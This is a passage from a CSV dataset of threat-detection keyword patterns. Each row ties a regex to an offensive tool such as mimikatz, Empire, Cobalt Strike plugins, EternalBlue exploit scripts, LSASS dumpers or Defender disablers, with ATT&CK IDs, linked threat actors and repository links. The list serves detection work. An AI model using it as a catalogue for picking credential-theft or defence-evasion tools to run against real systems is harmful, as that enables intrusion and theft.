Sandworm","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43206" "*Enum-Creds*",".{0,1000}Enum\-Creds.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43207" "*enumdomains;quit*",".{0,1000}enumdomains\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","43208" 
"*enumdomgroups;quit*",".{0,1000}enumdomgroups\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","43209" "*enumdomusers;quit*",".{0,1000}enumdomusers\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","43210" "*enumerate.cna*",".{0,1000}enumerate\.cna.{0,1000}","offensive_tool_keyword","red-team-scripts","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no Powershell. binary calls. or process injection). Additionally. 
adds a basic enumerate alias for Linux based systems in SSH sessions.","T1595","TA0007","N/A","N/A","Reconnaissance","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","N/A","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","43211" "*EnumerateAllDomainControllers*",".{0,1000}EnumerateAllDomainControllers.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","43212" "*Enumerate-AllHighPrivilegePrincipals*",".{0,1000}Enumerate\-AllHighPrivilegePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","43213" "*EnumerateDomainGpo*",".{0,1000}EnumerateDomainGpo.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","43214" "*Enumerate-MFAStatusOfHighPrivilegePrincipals*",".{0,1000}Enumerate\-MFAStatusOfHighPrivilegePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD 
Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","43215" "*Enumerating Administrators group, please wait*",".{0,1000}Enumerating\sAdministrators\sgroup,\splease\swait.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","43216" "*Enumerating new user, please wait*",".{0,1000}Enumerating\snew\suser,\splease\swait.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","43217" "*Enumeration.Net.GetNetLocalGroupMembers(*",".{0,1000}Enumeration\.Net\.GetNetLocalGroupMembers\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","43218" "*Enumeration/DesktopACL*",".{0,1000}Enumeration\/DesktopACL.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","43219" 
"*Enumeration\DesktopAC*",".{0,1000}Enumeration\\DesktopAC.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","43220" "*--env GOPROXY=https://goproxy.cn*",".{0,1000}\-\-env\sGOPROXY\=https\:\/\/goproxy\.cn.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43221" "*Env:TMP\ACl.log*",".{0,1000}Env\:TMP\\ACl\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","43222" "*env_var_spoofing_poc.cpp*",".{0,1000}env_var_spoofing_poc\.cpp.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? 
Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43223" "*eo.oe.kiwi*",".{0,1000}eo\.oe\.kiwi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","43224" "*EoP PoC exploiting the AMD driver *",".{0,1000}EoP\sPoC\sexploiting\sthe\sAMD\sdriver\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43225" "*EoP PoC exploiting the Intel driver *",".{0,1000}EoP\sPoC\sexploiting\sthe\sIntel\sdriver\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43226" "*eop_pdfwkrnl.py*",".{0,1000}eop_pdfwkrnl\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43227" "*eop_pdfwkrnl_loop.py*",".{0,1000}eop_pdfwkrnl_loop\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43228" "*eop_rtport.py*",".{0,1000}eop_rtport\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43229" "*eop_stdcdrvws64.py*",".{0,1000}eop_stdcdrvws64\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","43230" "*epicgames_stealer*",".{0,1000}epicgames_stealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","43231" "*epinna/weevely3*",".{0,1000}\/Weevely3.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","1","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","43232" "*erase_dos_magic_bytes(*",".{0,1000}erase_dos_magic_bytes\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","43234" "*erebe/wstunnel*",".{0,1000}erebe\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","43236" "*Erebus/*spacerunner*",".{0,1000}Erebus\/.{0,1000}spacerunner.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - 
FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","43237" "*ERPScan-tockenchpoken.zip*",".{0,1000}ERPScan\-tockenchpoken\.zip.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","43238" "*Error parsing lsass dump with pypykatz*",".{0,1000}Error\sparsing\slsass\sdump\swith\spypykatz.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","43240" "*Error: Could not create a thread for the shellcode*",".{0,1000}Error\:\sCould\snot\screate\sa\sthread\sfor\sthe\sshellcode.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","43241" 
"*eRv6yTYhShell*",".{0,1000}eRv6yTYhShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","43242" "*erwan2212/NTHASH-FPC*",".{0,1000}erwan2212\/NTHASH\-FPC.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","43243" "*ES.Alan.Core/*",".{0,1000}ES\.Alan\.Core\/.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","43244" "*es3n1n/no-defender*",".{0,1000}es3n1n\/no\-defender.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. 
(through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","43245" "*es3n1n\no-defender*",".{0,1000}es3n1n\\no\-defender.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","43246" "*escalate/golden_ticket*",".{0,1000}escalate\/golden_ticket.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","43247" "*escalate/unmarshal_cmd_exec*",".{0,1000}escalate\/unmarshal_cmd_exec.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","43248" "*EspressoCake/PPLDump_BOF*",".{0,1000}EspressoCake\/PPLDump_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","43251" "*et22fibzuzfyzgurm35sttm52qbzvdgzy5qhzy46a3gmkrrht3lec5ad.onion*",".{0,1000}et22fibzuzfyzgurm35sttm52qbzvdgzy5qhzy46a3gmkrrht3lec5ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","43266" "*Eternal Blue Windows Shellcode Compiler*",".{0,1000}Eternal\sBlue\sWindows\sShellcode\sCompiler.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#content","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43267" 
"*Eternalblue-*.exe*",".{0,1000}Eternalblue\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","43268" "*EternalBlue.ps1*",".{0,1000}EternalBlue\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43269" "*eternalblue.rb*",".{0,1000}eternalblue\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43270" "*eternalblue_exploit10.py*",".{0,1000}eternalblue_exploit10\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43271" "*eternalblue_exploit7.py*",".{0,1000}eternalblue_exploit7\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43272" "*eternalblue_exploit8.py*",".{0,1000}eternalblue_exploit8\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation 